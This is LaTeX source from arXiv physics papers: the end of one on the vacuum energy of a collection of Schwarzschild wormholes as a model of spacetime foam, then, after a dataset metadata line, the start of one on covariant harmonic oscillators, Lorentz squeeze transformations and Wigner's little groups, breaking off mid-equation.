\end{equation}
where $h_{ia}^{\bot }\left( \overrightarrow{x}\right) $ are the
eigenfunctions of
\begin{equation}
\left( \triangle _2\right) _j^a:=-\triangle \delta _j^{a_{}^{}}+2R_j^a.
\end{equation}
This is the Lichnerowicz operator projected on $\Sigma $ acting on traceless
transverse quantum fluctuations and $\lambda _N\left( p\right) $ are
infinite variational parameters. $\triangle $ is the curved Laplacian
(Laplace-Beltrami operator) on a Schwarzschild background and $R_{j\text{ }%
}^a$ is the mixed Ricci tensor whose components are:
\begin{equation}
R_j^a=diag\left\{ \frac{-2m}{r_{}^3},\frac m{r_{}^3},\frac m{r_{}^3}\right\}
.
\end{equation}
After normalization in spin space and after a rescaling of the fields in
such a way as to absorb $l_p^2$, $E_{|2}$ becomes in momentum space
\begin{equation}
E_{|2}\left( m,\lambda \right) =\frac V{2\pi ^2}\sum_{l=0}^\infty
\sum_{i=1}^2\int_0^\infty dpp^2\left[ \lambda _i\left( p\right) +\frac{%
E_i^2\left( p,m,l\right) }{\lambda _i\left( p\right) }\right] , \label{a3}
\end{equation}
where
\begin{equation}
E_{1,2}^2\left( p,m,l\right) =p^2+\frac{l\left( l+1\right) }{r_0^2}\mp \frac{%
3m}{r_0^3}
\end{equation}
and $V$ is the volume of the system. $r_0$ is related to the minimum radius
compatible with the wormhole throat. We know that the classical minimum is
achieved when $r_0=2m$. However, it is likely that quantum processes come
into play at short distances, where the wormhole throat is defined,
introducing a {\it quantum} radius $r_0>2m$. The minimization with respect
to $\lambda $ leads to $\bar{\lambda}_i\left( p,l,m\right) =\sqrt{%
E_i^2\left( p,m,l\right) }$ and eq.$\left( \ref{a3}\right) $ becomes
\begin{equation}
E_{|2}\left( m,\lambda \right) =2\frac V{2\pi ^2}\sum_{l=0}^\infty
\sum_{i=1}^2\int_0^\infty dpp^2\sqrt{E_i^2\left( p,m,l\right) },
\end{equation}
with $p^2+\frac{l\left( l+1\right) }{r_0^2}>\frac{3m}{r_0^3}.$ Thus, in
presence of the curved background, we get
\begin{equation}
E_{|2}\left( m\right) =\frac V{2\pi ^2}\frac 12\sum_{l=0}^\infty
\int_0^\infty dpp^2\left( \sqrt{p^2+c_{-}^2}+\sqrt{p^2+c_{+}^2}\right)
\end{equation}
where
\[
c_{\mp }^2=\frac{l\left( l+1\right) }{r_0^2}\mp \frac{3m}{r_0^3},
\]
while when we refer to the flat space, we have $m=0$ and $c^2=$ $\frac{%
l\left( l+1\right) }{r_0^2}$, with
\begin{equation}
E_{|2}\left( 0\right) =\frac V{2\pi ^2}\frac 12\sum_{l=0}^\infty
\int_0^\infty dpp^2\left( 2\sqrt{p^2+c^2}\right) .
\end{equation}
Since we are interested in the $UV$ limit, we will use a cut-off $\Lambda $
to keep under control the $UV$ divergence
\begin{equation}
\int_0^\infty \frac{dp}p\sim \int_0^{\frac \Lambda c}\frac{dx}x\sim \ln
\left( \frac \Lambda c\right) ,
\end{equation}
where $\Lambda \leq m_p.$ Note that in this context the introduction of a
cut-off at the Planck scale is quite natural if we look at a spacetime foam.
Thus $\Delta E\left( m\right) $ for high momenta becomes
\begin{equation}
\Delta E\left( m\right) \sim -\frac V{2\pi ^2}\left( \frac{3m}{r_0^3}\right)
^2\frac 1{16}\ln \left( \frac{r_0^3\Lambda ^2}{3m}\right) . \label{a4}
\end{equation}
We now compute the minimum of $\widetilde{\Delta E}\left( m\right) =E\left(
0\right) -E\left( m\right) =-\Delta E\left( m\right) $. We obtain two values
for $m$: $m_1=0$, i.e. flat space and $m_2=\Lambda ^2e^{-\frac 12}r_0^3/3$.
Thus the minimum of $\widetilde{\Delta E}\left( m\right) $ is at the value $%
\widetilde{\Delta E}\left( m_2\right) =\frac V{64\pi ^2}\frac{\Lambda ^4}e$.
Recall that $m=MG$, thus
\begin{equation}
M=G^{-1}\Lambda ^2e^{-\frac 12}r_0^3/3.
\end{equation}
When $\Lambda \rightarrow m_p$, then $r_0\rightarrow l_p.$ This means that
an Heisenberg uncertainty relation of the type $l_pm_p=1$ (in natural units)
has to be satisfied, then
\begin{equation}
M=m_p^2e^{-\frac 12}m_p^{-1}/3=\frac{m_p}{3\sqrt{e}}.
\end{equation}
\section{N$_{w}$ wormholes approximation}
\label{p3}
Suppose to consider $N_{w}$ wormholes and assume that there exists a
covering of $\Sigma $ such that $\Sigma =\cup _{i=1}^{N_{w}}\Sigma _{i}$,
with $\Sigma _{i}\cap \Sigma _{j}=\emptyset $ when $i\neq j$. Each $\Sigma
_{i}$ has the topology $S^{2}\times R^{1}$ with boundaries $\partial \Sigma
_{i}^{\pm }$ with respect to each bifurcation surface. On each surface $%
\Sigma _{i}$, quasilocal energy gives
\begin{equation}
E_{i\text{ }{\rm quasilocal}}=\frac{2}{l_{p}^{2}}\int_{S_{i+}}d^{2}x\sqrt{%
\sigma }\left( k-k^{0}\right) -\frac{2}{l_{p}^{2}}\int_{S_{i-}}d^{2}x\sqrt{%
\sigma }\left( k-k^{0}\right) ,
\end{equation}
and by using the expression of the trace
\begin{equation}
k=-\frac{1}{\sqrt{h}}\left( \sqrt{h}n^{\mu }\right) _{,\mu },
\end{equation}
we obtain at either boundary that
\begin{equation}
k=\frac{-2r,_{y}}{r},
\end{equation}
where we have assumed that the function $r,_{y}$ is positive for $S_{i+}$
and negative for $S_{i-}$. The trace associated with the subtraction term is
taken to be $k^{0}=-2/r$ for $B_{i+}$ and $k^{0}=2/r$ for $B_{i-}$. Here the
quasilocal energy with subtraction terms included is
\begin{equation}
E_{i\text{ }{\rm quasilocal}}=E_{i+}-E_{i-}=\left( r\left[ 1-\left|
r,_{y}\right| \right] \right) _{y=y_{i+}}-\left( r\left[ 1-\left|
r,_{y}\right| \right] \right) _{y=y_{i-}}.
\end{equation}
Note that the total quasilocal energy is zero for boundary conditions
symmetric with respect to {\it each} bifurcation surface $S_{0,i}$. We are
interested to a large number of wormholes, each of them contributing with a
Hamiltonian of the type $H_{|2}$. If the wormholes number is $N_{w}$, we
obtain (semiclassically, i.e., without self-interactions)
\begin{equation}
H_{tot}^{N_{w}}=\underbrace{H^{1}+H^{2}+\ldots +H^{N_{w}}}.
\end{equation}
Thus the total energy for the collection is
\[
E_{|2}^{tot}=N_{w}H_{|2}.
\]
The same happens for the trial wave functional which is the product of $%
N_{w} $ t.w.f.. Thus
\[
\Psi _{tot}^{\perp }=\Psi _{1}^{\perp }\otimes \Psi _{2}^{\perp }\otimes
\ldots \ldots \Psi _{N_{w}}^{\perp }={\cal N}\exp N_{w}\left\{ -\frac{1}{%
4l_{p}^{2}}\left[ \left\langle \left( g-\bar{g}\right) K^{-1}\left( g-\bar{g}%
\right) \right\rangle _{x,y}^{\perp }\right] \right\}
\]
\[
={\cal N}\exp \left\{ -\frac{1}{4}\left[ \left\langle \left( g-\bar{g}%
\right) K^{-1}\left( g-\bar{g}\right) \right\rangle _{x,y}^{\perp }\right]
\right\} ,
\]
where we have rescaled the fluctuations $h=g-\bar{g}$ in such a way to
absorb $N_{w}/l_{p}^{2}.$ Of course, if we want the trial wave functionals
be independent one from each other, boundaries $\partial \Sigma ^{\pm }$
have to be reduced with the enlarging of the wormholes number $N_{w}$,
otherwise overlapping terms could be produced. Thus, for $N_{w}$-wormholes,
we obtain
\[
H^{tot}=N_{w}H=\int_{\Sigma }d^{3}x\left[ G_{ijkl}\pi ^{ij}\pi ^{kl}\left(
N_{w}\frac{l_{p}^{2}}{\sqrt{g}}\right) -\left( N_{w}\frac{\sqrt{g}}{l_{p}^{2}%
}\right) R^{\left( 3\right) }\right]
\]
\[
=\int_{\Sigma }d^{3}x\left[ G_{ijkl}\pi ^{ij}\pi ^{kl}\left( \frac{%
l_{N_{w}}^{2}}{\sqrt{g}}\right) -\left( N_{w}^{2}\frac{\sqrt{g}}{%
l_{N_{w}}^{2}}\right) R^{\left( 3\right) }\right] ,
\]
where we have defined $l_{N_{w}}^{2}=l_{p}^{2}N_{w}$ with $l_{N_{w}}^{2}$
fixed and $N_{w}\rightarrow \infty .$ Thus, repeating the same steps of
section \ref{p2} for $N_{w}$ wormholes, we obtain
\begin{equation}
\Delta E_{N_{w}}\left( m\right) \sim -N_{w}^{2}\frac{V}{2\pi ^{2}}\left(
\frac{3m}{r_{0}^{3}}\right) ^{2}\frac{1}{16}\ln \left( \frac{%
r_{0}^{3}\Lambda ^{2}}{3m}\right) .
\end{equation}
Then at one loop the cooperative effects of wormholes behave as one {\it %
macroscopic single }field multiplied by $N_{w}^{2}$; this is the consequence
of the coherency assumption. We have just explored the consequences of this
result in Ref.\cite{Remo1}$.$ Indeed, coming back to the single wormhole
contribution we have seen that the black hole pair creation probability
mediated by a wormhole is energetically favored with respect to the
permanence of flat space provided we assume that the boundary conditions be
symmetric with respect to the bifurcation surface which is the throat of the
wormhole. In this approximation boundary terms give zero contribution and
the volume term is nonvanishing. As in the one-wormhole case, we now compute
the minimum of $\widetilde{\Delta E}_{N_{w}}\left( m\right) =\left( E\left(
0\right) -E\left( m\right) \right) _{N_{w}}=-\Delta E_{N_{w}}\left( m\right)
$. The minimum is reached for $\bar{m}=\Lambda ^{2}e^{-\frac{1}{2}%
}r_{0}^{3}/3$. Thus the minimum is
\begin{equation}
\widetilde{\Delta E}\left( \bar{m}\right) =N_{w}^{2}\frac{V}{64\pi ^{2}}%
\frac{\Lambda ^{4}}{e}.
\end{equation}
The main difference with the one wormhole case is that we have $N_{w}$
wormholes contributing with the same amount of energy. Since $%
m=MN_{w}G=Ml_{N_{w}}^{2}$, thus
\begin{equation}
M=\left( l_{N_{w}}^{2}/N_{w}\right) ^{-1}\Lambda ^{2}e^{-\frac{1}{2}%
}r_{0}^{3}/3.
\end{equation}
When $\Lambda \rightarrow m_{p}$, then $r_{0}\rightarrow l_{p}$ and $%
l_{p}m_{p}=1$. Thus
\begin{equation}
M=\frac{\left( l_{N_{w}}^{2}/N_{w}\right) ^{-1}m_{p}^{-1}}{3\sqrt{e}}=N_{w}%
\frac{m_{N_{w}}}{3\sqrt{e}}
\end{equation}
So far, we have discussed the stable modes contribution. However, we have
discovered that for one wormhole also unstable modes contribute to the total
energy\cite{GPY,Remo1}. Since we are interested to a large number of
wormholes, the first question to answer is: what happens to the boundaries
when the wormhole number is enlarged. In the one wormhole case, the
existence of one negative mode is guaranteed by the vanishing of the
eigenfunction of the operator $\Delta _{2}$ at infinity, which is the same
space-like infinity of the quasilocal energy, i.e. we have the $ADM$
positive mass $M$ in a coordinate system of the universe where the observer
is present and the anti-$ADM$ mass in a coordinate system where the observer
is not there. When the number of wormholes grows, to keep the coherency
assumption valid, the space available for every single wormhole has to be
reduced to avoid overlapping of the wave functions. This means that boundary
conditions are not fixed at infinity, but at a certain finite radius and the
$ADM$ mass term is substituted by the quasilocal energy expression under the
condition of having symmetry with respect to each bifurcation surface. As $%
N_{w}$ grows, the boundary radius $\bar{r}$ reduces more and more and the
unstable mode disappears. This means that there will exist a certain radius $%
r_{c}$ where below which no negative mode will appear and there will exist a
given value $N_{w_{c}}$ above which the same effect will be produced. In
rigorous terms: $\forall N\geq N_{w_{c}}\ \exists $ $r_{c}$ $s.t.$ $\forall
\ r_{0}\leq r\leq r_{c},\ \sigma \left( \Delta _{2}\right) =\emptyset $.
This means that the system begins to be stable. In support of this idea, we
invoke the results discovered in Ref. \cite{B.Allen} where, it is explicitly
shown that the restriction of spatial boundaries leads to a stabilization of
the system. Thus at the minimum, we obtain the typical energy density
behavior of the foam
\begin{equation}
\frac{\Delta E}{V}\sim -N_{w}^{2}\Lambda ^{4}
\end{equation}
\section{Conclusions and Outlooks}
\label{p4}
According to Wheeler's ideas about quantum fluctuation of the metric at the
Planck scale, we have used a simple model made by a large collection of
wormholes to investigate the vacuum energy contribution needed to the
formation of a foamy spacetime. Such investigation has been made in a
semiclassical approximation where the wormholes are treated independently
one from each other (coherency hypothesis). The starting point is the single
wormhole, whose energy contribution has the typical trend of the
gravitational field energy fluctuation. The wormhole considered is of the
Schwarzschild type and every energy computation has to be done having in
mind the reference space, i.e. flat space. When we examine the wormhole
collection, we find the same trend in the energy of the single case. This is
obviously the result of the coherency assumption. However, the single
wormhole cannot be taken as a model for a spacetime foam, because it
exhibits one negative mode. This negative mode is the key of the topology
change from a space without holes (flat space) to a space with an hole
inside (Schwarzschild space). However things are different when we consider
a large number of wormholes $N_w$. Let us see what is going on: the
classical vacuum, represented by flat space is stable under nucleation of a
single black hole, while it is unstable under a neutral pair creation with
the components residing in \ different universes divided by a wormhole. When
the topology change has primed by means of a single wormhole, there will be
a considerable production of pairs mediated by their own wormhole. The
result is that the hole production will persist until the critical value $%
N_{w_c}$ will be reached and spacetime will enter the stable phase. If we
look at this scenario a little closer, we can see that it has the properties
of the Wheeler foam. Nevertheless, we have to explain why observations
measure a flat space structure. To this purpose, we have to recall that the
foamy spacetime structure should be visible only at the Planck scale, while
at greater scales it is likely that the flat structure could be recovered by
means of averages over the collective functional describing the {\it %
semiclassical} foam. Indeed if $\eta _{ij}$ is the spatial part of the flat
metric, ordinarily we should obtain
\begin{equation}
\left\langle \Psi \left| g_{ij}\right| \Psi \right\rangle =\eta _{ij},
\end{equation}
where $g_{ij}$ is the spatial part of the gravitational field. However in
the foamy representation we should consider, instead of the previous
expectation value, the expectation value of the gravitational field
calculated on wave functional representing the foam, i.e., to see that at
large distances flat space is recovered we should obtain
\begin{equation}
\left\langle \Psi _{foam}\left| g_{ij}\right| \Psi _{foam}\right\rangle
=\eta _{ij},
\end{equation}
where $\Psi _{foam}$ is a superposition of the single-wormhole wave
functional
\begin{equation}
\Psi _{foam}=\sum_{i=1}^{N_w}\Psi _i^{\perp }.
\end{equation}
This has to be attributed to the semiclassical approximation which render
this system a non-interacting system. However, things can change when we
will consider higher order corrections and the other terms of the action
decomposition, i.e. the spin one and spin zero terms. Nevertheless, we can
argue that only spin zero terms (associated with the conformal factor) will
be relevant, even if the part of the action which carries the physical
quantities is that discussed in this text, i.e., the spin two part of the
action related to the gravitons.
\section{Acknowledgments}
I wish to thank R. Brout, M. Cavagli\`{a}, C. Kiefer, D. Hochberg, G.
Immirzi, S. Liberati, P. Spindel and M. Visser for useful comments and
discussions.
| 2024-02-18T23:40:12.713Z | 1998-11-26T19:56:39.000Z | algebraic_stack_train_0000 | 1,666 | 4,013 |
|
proofpile-arXiv_065-8203 | \section{Introduction}\label{intro}
Harmonic oscillators played the essential role in the development of
quantum mechanics. From the mathematical point of view, the present
form of quantum mechanics did not advance too far from the oscillator
framework. Thus, the first relativistic wave function has to be the
oscillator wave function. With this point in mind, Dirac in 1945 wrote
down a normalizable four-dimensional wave function and attempted to
construct representations of the Lorentz group~\cite{dir45}, and
started a history of the oscillators which can be
Lorentz-boosted~\cite{yuka53,knp86}.
Let us consider the Minkowskian space consisting of the
three-dimensional space of $(x, y, z)$ and one time variable $t$.
Then the quantity $\left(x^{2} + y^{2} + z^{2} - t^{2}\right)$
remains invariant under Lorentz transformations. On the other hand,
$\left(x^{2} + y^{2} + z^{2} + t^{2}\right)$ is not invariant.
Thus, the exponential form
\begin{equation}\label{ex1}
\exp\left(x^{2} + y^{2} + z^{2} - t^{2}\right)
\end{equation}
is a Lorentz-invariant quantity, while the form
\begin{equation}\label{ex2}
\exp\left(x^{2} + y^{2} + z^{2} + t^{2}\right)
\end{equation}
is not. The Gaussian function of Eq.(\ref{ex2}) is localized in the
$t$ variable. It was Dirac who wrote down this normalizable Gaussian
form in 1945~\cite{dir45}. In 1963, the author of this report was
fortunate enough to hear directly from Prof. Dirac that the physics of
special relativity is much richer than writing down Lorentz-invariant
quantities. This could mean that we should study more systematically
the above normalizable form under the influence of Lorentz boosts,
and this study has led to the observation that Lorentz boosts are
squeeze transformations~\cite{kn73,knp91}.
The exponential form of Eq.(\ref{ex1}) is Lorentz-invariant but cannot
be normalized. This aspect was noted by Feynman {\it et al}. in their
1971 paper~\cite{fkr71}. In their paper, Feynman {\it et al}. tell us
not to use Feynman diagrams but to use oscillator wave functions when
we approach relativistic bound states. In this report, we shall use
much of the formalism given in Ref.~\cite{fkr71}, but not their
Lorentz-invariant wave functions which are not normalizable.
In this report, we discuss the oscillator representations of the
$O(3,1)$ and explain why this representation is adequate for internal
space-time symmetry of relativistic extended hadrons. This group
has $O(1,1)$ as a subgroup which describes Lorentz boosts along a
given direction. It is shown that Lorentz boosts are squeeze
transformations. It is shown also that the infinite-dimensional
unitary representation of this squeeze group constitutes the
mathematical basis for squeezed states of light.
In Sec.~\ref{subg}, we discuss the three-parameter subgroups of the
six-parameter Lorentz group which leaves the four-momentum of the
particle invariant. These groups govern the internal space-time
symmetries of relativistic particles, and they are called Wigner's
little groups~\cite{wig39}.
In Sec.~\ref{covham}, it is shown that the covariant harmonic
oscillators constitute a representation of the Poincar\'e group for
relativistic extended particles. If we add Lorentz boosts to
the oscillator formalism, the symmetry group becomes non-compact, and
its unitary representations become infinite-dimensional.
In Sec.~\ref{infinite}, we study an infinite-dimensional unitary
representation for the harmonic oscillator formalism.
\section{Subgroups of the Lorentz Group}\label{subg}
The Poincar\'e group is the group of inhomogeneous Lorentz
transformations, namely Lorentz transformations followed by space-time
translations. This group is known as the fundamental space-time
symmetry group for relativistic particles. This ten-parameter group
has many different representations. For space-time symmetries, we study
first Wigner's little groups. The little group is a maximal subgroup
of the six-parameter Lorentz group whose transformations leave the
four-momentum of a given particle invariant. The little group therefore
governs the internal space-time symmetry of the particles. Massive
particles in general are known as spin degrees of freedom. Massless
particles in general have the helicity and gauge degrees of freedom.
Let $J_{i}$ be the three generators of the rotation group and $K_{i}$
be the three boost generators. They then satisfy the commutation
relations
\begin{equation}
\left[J_{i}, J_{j}\right] = i \epsilon_{ijk} J_{k} , \qquad
\left[J_{i}, K_{j}\right] = i \epsilon_{ijk} K_{k} , \qquad
\left[K_{i}, K_{j}\right] = - i \epsilon_{ijk} J_{k} .
\end{equation}
The three-dimensional rotation group is a subgroup of the Lorentz group.
If a particle is at rest, we can rotate it without changing the
four-momentum. Thus, the little group for massive particles is
the three-parameter rotation group. If the particle is boosted, it
gains a momentum along the boosted direction. If it is boosted along
the $z$ direction, the boost operator becomes
\begin{equation}
B_{3}(\eta) = \exp\left(-i\eta K_{3}\right) .
\end{equation}
The little group is then generated by
\begin{equation}
J'_{i} = B_{3}(\eta) J_{3} \left(B_{3}(\eta)\right)^{-1} .
\end{equation}
These boosted $O(3)$ generators satisfy the same set of commutation
relations as the set for $O(3)$.
\vspace{5mm}
\begin{quote}
Table I. Covariance of the energy-momentum relation, and covariance of
the internal space-time symmetry groups. The quark model and the parton
model are two different manifestations of the same covariant entity.
\end{quote}
\begin{center}
\begin{tabular}{ccc}
Massive, Slow & COVARIANCE & Massless, Fast \\[2mm]\hline
{}&{}&{}\\
$E = p^{2}/2m$ & Einstein's $E = mc^{2}$ & $E = cp$ \\[4mm]\hline
{}&{}&{} \\
$S_{3}$ & {} & $S_{3}$ \\ [-1mm]
{} & Wigner's Little Group & {} \\[-1mm]
$S_{1}, S_{2}$ & {} & Gauge Trans. \\[4mm]\hline
{}&{}&{} \\
{}&{}&{} \\ [-2mm]
Quarks & Covariant Harmonic Oscillators & Partons \\[8mm]\hline
\end{tabular}
\end{center}
\vspace{5mm}
If the parameter $\eta$ becomes infinite, the particle becomes like
a massless particle. If we go through the contraction procedure
spelled out by Inonu and Wigner in 1953~\cite{inonu53}, the $O(3)$-like
little group becomes contracted to the $E(2)$-like little group for
massless particles generated by $J_{3}, N_{1}$, and
$N_{2}$~\cite{bacryc68,hks83pl},where
\begin{equation}
N_{1} = K_{1} - J_{2} , \qquad N_{2} = K_{2} + J_{1} .
\end{equation}
These $N$ generators are known to generate gauge transformations for
massless particles~\cite{janner71,hks82}.
Gauge transformations for spin-1 photons are
well known. As for massless spin-1/2 particles, neutrino polarizations
are due to gauge invariance.
The transition from massive to massless particles is illustrated
in the second row of Table I. In Sec. \ref{covham}, we shall
discuss how a massive particle with space-time extension be boosted
from its rest frame to an infinite-momentum frame. This aspect is
illustrated in the third row of Table I.
\section{Covariant Harmonic Oscillators}\label{covham}
If we construct a representation of the Lorentz group using normalizable
harmonic oscillator wave functions, the result is the covariant harmonic
oscillator formalism~\cite{knp86}. The formalism constitutes a
representation of Wigner's O(3)-like little group for a massive particle
with internal space-time structure. This oscillator formalism has been
shown to be effective in explaining the basic phenomenological features
of relativistic extended hadrons observed in high-energy laboratories.
In particular, the formalism shows that the quark model and Feynman's
parton picture~\cite{fey69} are two different manifestations of one
relativistic entity \cite{knp86,kim89}.
The essential feature of the covariant harmonic oscillator formalism is
that Lorentz boosts are squeeze transformations~\cite{kn73}. In the
light-cone coordinate system, the boost transformation expands one
coordinate while contracting the other so as to preserve the product of
these two coordinate remains constant. We shall show that the parton
picture emerges from this squeeze effect.
The covariant harmonic oscillator formalism has been discussed exhaustively
in the literature, and it is not necessary to give another full-fledged
treatment in the present paper. We shall discuss here one of the most
puzzling problems in high-energy physics, namely whether quarks are partons.
It is now a well-accepted view that hadrons are bound states of quarks.
This view is correct if the hadron is at rest or nearly at rest. On the
other hand, it appears as a collection of partons when it moves with a
speed very close to that of light. This is called Feynman's parton picture
\cite{fey69}.
Let us consider a bound state of two particles. For convenience, we shall
call the bound state the hadron, and call its constituents quarks. Then
there is a Bohr-like radius measuring the space-like separation between the
quarks. There is also a time-like separation between the quarks, and this
variable becomes mixed with the longitudinal spatial separation as the
hadron moves with a relativistic speed. There are no quantum excitations
along the time-like direction. On the other hand, there is the time-energy
uncertainty relation which allows quantum transitions. It is possible to
accommodate these aspect within the framework of the present form of quantum
mechanics. The uncertainty relation between the time and energy variables is
the c-number relation, which does not allow excitations along the time-like
coordinate. We shall see that the covariant harmonic oscillator formalism
accommodates this narrow window in the present form of quantum mechanics.
Let us consider a hadron consisting of two quarks. If the space-time
position of two quarks are specified by $x_{a}$ and $x_{b}$ respectively,
the system can be described by the variables
\begin{equation}
X = (x_{a} + x_{b})/2 , \qquad x = (x_{a} - x_{b})/2\sqrt{2} .
\end{equation}
The four-vector $X$ specifies where the hadron is located in space and time,
while the variable $x$ measures the space-time separation between the
quarks. In the convention of Feynman {\it et al.}~\cite{fkr71}, the internal
motion of the quarks bound by a harmonic oscillator potential of unit
strength can be described by the Lorentz-invariant equation
\begin{equation}
{1\over 2}\left\{x^{2}_{\mu} - {\partial ^{2} \over \partial x_{\mu}^{2}}
\right\} \psi(x)= \lambda \psi(x) .
\end{equation}
We use here the space-favored metric: $x^{\mu} = (x, y, z, t)$.
It is possible to construct a representation of the Poincar\'e group
from the solutions of the above differential equation~\cite{knp86}.
If the hadron is at rest, the solution should take the form
\begin{equation}
\psi(x,y,z,t) = \phi(x,y,z) \left({1\over \pi}\right)^{1/4}
\exp \left(-t^{2}/2 \right) ,
\end{equation}
where $\phi(x,y,z)$ is the wave function for the three-dimensional
oscillator. If we use the spherical coordinate system, this wave
function will carry appropriate angular momentum quantum numbers.
Indeed, the above wave function constitutes a representation of Wigner's
$O(3)$-like little group for a massive particle~\cite{knp86}. There are
no time-like excitations, and this is consistent with our observation
of the real world. It was Dirac who noted first this space-time
asymmetry in quantum mechanics~\cite{dir27}. However, this asymmetry
is quite consistent with the $O(3)$ symmetry of the little group for
hadrons.
Since the three-dimensional oscillator differential equation is
separable in both the spherical and Cartesian coordinate systems, the
spherical form of $\phi(x,y,z)$ consists of Hermite polynomials of
$x, y$, and $z$. If the Lorentz boost is made along the $z$ direction,
the $x$ and $y$ coordinates are not affected, and can be dropped from
the wave function. The wave function of interest can be written as
\begin{equation}
\psi^{n}(z,t) = \left({1\over \pi}\right)^{1/4}\exp \pmatrix{-t^{2}/2}
\phi_{n}(z) ,
\end{equation}
with
\begin{equation}\label{1dwf}
\phi_{n}(z) = \left({1 \over \pi n!2^{n}} \right)^{1/2} H_{n}(z)
\exp (-z^{2}/2) ,
\end{equation}
where $\psi^{n}(z)$ is for the $n$-th excited oscillator state.
The full wave function $\psi^{n}(z,t)$ is
\begin{equation}\label{wf}
\psi^{n}_{0}(z,t) = \left({1\over \pi n! 2^{n}}\right)^{1/2} H_{n}(z)
\exp \left\{-{1\over 2}\left(z^{2} + t^{2} \right) \right\} .
\end{equation}
The subscript 0 means that the wave function is for the hadron at rest. The
above expression is not Lorentz-invariant, and its localization undergoes a
Lorentz squeeze as the hadron moves along the $z$ direction~\cite{knp86}.
It is convenient to use the light-cone variables to describe Lorentz boosts.
The light-cone coordinate variables are
\begin{equation}
u = (z + t)/\sqrt{2} , \qquad v = (z - t)/\sqrt{2} .
\end{equation}
In terms of these variables, the Lorentz boost along the $z$
direction,
\begin{equation}
\pmatrix{z' \cr t'} = \pmatrix{\cosh \eta & \sinh \eta \cr \sinh \eta &
\cosh \eta}\pmatrix{z \cr t} ,
\end{equation}
takes the simple form
\begin{equation}\label{lorensq}
u' = e^{\eta} u , \qquad v' = e^{-\eta} v ,
\end{equation}
where $\eta $ is the boost parameter and is $\tanh ^{-1}(v/c)$.
The wave function of Eq.(\ref{wf}) can be written as
\begin{equation}\label{10}
\psi^{n}_{o}(z,t) = \psi^{n}_{0}(z,t)
= \left({1 \over \pi n!2^{n}} \right)^{1/2} H_{n}\left((u + v)/\sqrt{2}
\right) \exp \left\{-{1\over 2} (u^{2} + v^{2}) \right\} .
\end{equation}
If the system is boosted, the wave function becomes
\begin{equation}\label{11}
\psi^{n}_{\eta}(z,t) = \left({1 \over \pi n!2^{n}} \right)^{1/2}
H_{n} \left((e^{-\eta}u + e^{\eta}v)/\sqrt{2} \right)
\times \exp \left\{-{1\over 2}\left(e^{-2\eta}u^{2} +
e^{2\eta}v^{2}\right)\right\} .
\end{equation}
In both Eqs. (\ref{10}) and (\ref{11}), the localization property of the wave
function in the $u v$ plane is determined by the Gaussian factor, and it
is sufficient to study the ground state only for the essential feature of
the boundary condition. The wave functions in Eq.(\ref{10}) and
Eq.(\ref{11}) then respectively become
\begin{equation}\label{13}
\psi^{0}(z,t) = \left({1 \over \pi} \right)^{1/2}
\exp \left\{-{1\over 2} (u^{2} + v^{2}) \right\} .
\end{equation}
If the system is boosted, the wave function becomes
\begin{equation}\label{14}
\psi_{\eta}(z,t) = \left({1 \over \pi}\right)^{1/2}
\exp \left\{-{1\over 2}\left(e^{-2\eta}u^{2} +
e^{2\eta}v^{2}\right)\right\} .
\end{equation}
We note here that the transition from Eq.(\ref{13}) to Eq.(\ref{14}) is a
squeeze transformation. The wave function of Eq.(\ref{13}) is distributed
within a circular region in the $u v$ plane, and thus in the $z t$ plane.
On the other hand, the wave function of Eq.(\ref{14}) is distributed in an
elliptic region.
\section{Unitary Infinite-dimensional Representation}\label{infinite}
Let us go back to Eq.(\ref{10}) and Eq.(\ref{11}). We are now
interested in writing them in terms of the one-dimensional oscillator
wave functions given in Eq.(\ref{1dwf}). After some standard
calculations~\cite{knp86}, we can write the squeezed wave function as
\begin{equation}\label{power}
\psi^{n}_{\eta}(z,t) = \left({1\over\cosh\eta}\right)^{n+1}\sum^{}_{k}
\left((n + k)!\over n!k!\right)^{1/2}(\tanh\eta)^{k} \phi_{n+k}(z)
\phi_{n}(t) .
\end{equation}
If the parameter $\eta$ becomes zero, this form becomes the rest-frame
wave function of Eq.(\ref{10}).
It is sometimes more convenient to use the parameter $\beta$ defined
as
\begin{equation}
\beta = \tanh\eta .
\end{equation}
This parameter is the speed of the hadron divided by the speed of light.
In terms of this parameter, the expression of Eq.(\ref{power}) can be
written as
\begin{equation}\label{power2}
\psi^{n}_{\eta}(z,t) = \left(1 - \beta^{2}\right)^{(n+1)/2}\sum^{}_{k}
\left((n + k)!\over n!k!\right)^{1/2} \beta^{k} \phi_{n+k}(x)
\phi_{n}(t) .
\end{equation}
If we take the integral
\begin{equation}\label{integ}
\int |\psi^{n}_{\eta}(z,t)|^{2} dz dt
= \left(1 - \beta^{2}\right)^{n+1} \sum^{}_{k}
\left((n + k)!\over n!k!\right) \beta^{2k} .
\end{equation}
The sum in the above expression is the same as the binomial expansion
of
$$
\left(1 - \beta^{2}\right)^{-(n+1)}.
$$
Thus, the right hand side of Eq.(\ref{integ}) is 1. The power series
expansion of Eq.(\ref{power}) reflects a well-known but hard-to-prove
mathematical theorem that unitary representations of non-compact groups
are infinite-dimensional. The Lorentz group is a non-compact group.
If $n = 0$, the above form becomes simplified to
\begin{equation}\label{power0}
\psi_{\eta}(z,t) = \left(1 - \beta^{2}\right)^{1/2}\sum^{}_{k}
\beta^{k} \phi_{k}(z) \phi_{k}(t) .
\end{equation}
This is the power series expansion of Eq.(\ref{14}). This relatively
simple form is very useful in many other branches of physics.
It is well known that the mathematics of the Fock space in quantum
field theory is that of harmonic oscillators. Among them, the
coherent-state representation occupies a prominent place because
it is the basic language for laser optics. Recently, two photon
coherent states have been observed and the photon distribution is
exactly like that of the wave function given in Eq.(\ref{power}).
These coherent states are commonly called squeezed states. It is
very difficult to see why the word ``squeeze'' has to be associated
with the power series expansion given in Eq.(\ref{power}) or
Eq.(\ref{power2}). It is however quite clear from the expression of
Eq.(\ref{14}) that Gaussian distribution is squeezed. Thus, the
above representation tells us how squeezed states are squeezed.
Next, let us briefly discuss the role of this infinite dimensional
representation in understanding the density matrix. For simplicity,
we shall work with the squeezed ground-state wave function. From the
wave function of Eq.(\ref{power0}), we can construct the pure-state
density matrix
\begin{equation}\label{pure}
\rho_{\eta}(z,t;z',t') = \psi_{\eta}(z,t)\psi_{\eta}(z',t') ,
\end{equation}
which satisfies the condition $\rho^{2} = \rho $:
\begin{equation}
\rho_{\eta}(z,t;z',t') = \int \rho_{\eta}(z,t;z'',t'')
\rho_{\eta}(z'',t'';z',t') dz'' dt'' .
\end{equation}
However, there are at present no measurement theories which accommodate
the time-separation variable t. Thus, we can take the trace of the
$\rho$ matrix with respect to the $t$ variable. Then the resulting
density matrix is
\begin{equation}\label{densi}
